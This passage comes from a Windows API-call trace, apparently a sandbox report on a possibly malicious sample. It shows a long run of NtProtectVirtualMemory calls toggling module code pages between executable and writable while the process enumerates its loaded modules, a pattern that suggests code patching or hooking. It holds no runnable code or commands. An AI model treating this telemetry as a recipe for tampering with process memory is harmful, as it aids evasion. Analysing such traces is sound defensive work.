OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.583] GetCurrentProcess () returned 0xffffffff [0081.583] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d18, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.583] GetCurrentProcess () returned 0xffffffff [0081.583] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d18, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.583] GetCurrentProcess () returned 0xffffffff [0081.583] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d1c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.584] GetCurrentProcess () returned 0xffffffff [0081.584] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d1c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.584] GetCurrentProcess () returned 0xffffffff [0081.584] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d20, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.584] GetCurrentProcess () returned 0xffffffff [0081.584] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d20, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.585] GetCurrentProcess () returned 0xffffffff [0081.585] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d70, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.585] GetCurrentProcess () returned 0xffffffff [0081.585] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d70, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.585] GetCurrentProcess () returned 0xffffffff [0081.585] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d7c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.586] GetCurrentProcess () returned 0xffffffff [0081.586] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d7c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.586] GetCurrentProcess () returned 0xffffffff [0081.586] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d80, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.586] GetCurrentProcess () returned 0xffffffff [0081.586] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40d80, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.586] GetCurrentProcess () returned 0xffffffff [0081.587] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40f20, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.587] GetCurrentProcess () returned 0xffffffff [0081.587] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b40f20, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b40000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.588] GetCurrentProcess () returned 0xffffffff [0081.588] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b411bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.588] GetCurrentProcess () returned 0xffffffff [0081.588] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b411bc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.589] GetCurrentProcess () returned 0xffffffff [0081.589] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4138c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.589] GetCurrentProcess () returned 0xffffffff [0081.589] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75b4138c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75b41000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.589] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.591] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.591] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599035c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.592] GetCurrentProcess () returned 0xffffffff [0081.592] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599035c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.592] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599036c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.593] GetCurrentProcess () returned 0xffffffff [0081.593] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599036c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.593] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599038c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.593] GetCurrentProcess () returned 0xffffffff [0081.593] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599038c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.593] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990390, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.594] GetCurrentProcess () returned 0xffffffff [0081.594] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990390, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.594] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990394, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.595] GetCurrentProcess () returned 0xffffffff [0081.595] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990394, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.595] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990398, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.595] GetCurrentProcess () returned 0xffffffff [0081.595] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990398, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.595] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759903c0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.596] GetCurrentProcess () returned 0xffffffff [0081.596] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759903c0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.596] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990414, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.596] GetCurrentProcess () returned 0xffffffff [0081.596] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990414, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.597] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990418, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.597] GetCurrentProcess () returned 0xffffffff [0081.597] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990418, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.597] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599044c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.598] GetCurrentProcess () returned 0xffffffff [0081.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599044c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990454, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.599] GetCurrentProcess () returned 0xffffffff [0081.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990454, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990488, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.599] GetCurrentProcess () returned 0xffffffff [0081.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990488, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.600] GetCurrentProcess () returned 0xffffffff [0081.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.600] GetCurrentProcess () returned 0xffffffff [0081.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.601] GetCurrentProcess () returned 0xffffffff [0081.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990528, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.602] GetCurrentProcess () returned 0xffffffff [0081.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990528, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.602] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0081.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0024, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.604] GetCurrentProcess () returned 0xffffffff [0081.604] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0024, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0028, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.605] GetCurrentProcess () returned 0xffffffff [0081.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0028, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c002c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.606] GetCurrentProcess () returned 0xffffffff [0081.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c002c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0048, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.606] GetCurrentProcess () returned 0xffffffff [0081.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0048, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0050, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.607] GetCurrentProcess () returned 0xffffffff [0081.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0050, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0070, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.607] GetCurrentProcess () returned 0xffffffff [0081.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0070, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.608] GetCurrentProcess () returned 0xffffffff [0081.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.609] GetCurrentProcess () returned 0xffffffff [0081.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.609] GetCurrentProcess () returned 0xffffffff [0081.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.610] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00b0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.610] GetCurrentProcess () returned 0xffffffff [0081.610] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00b0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.610] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00c4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.611] GetCurrentProcess () returned 0xffffffff [0081.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00c4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00cc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0081.611] GetCurrentProcess () returned 0xffffffff [0081.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00cc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0081.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00d0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 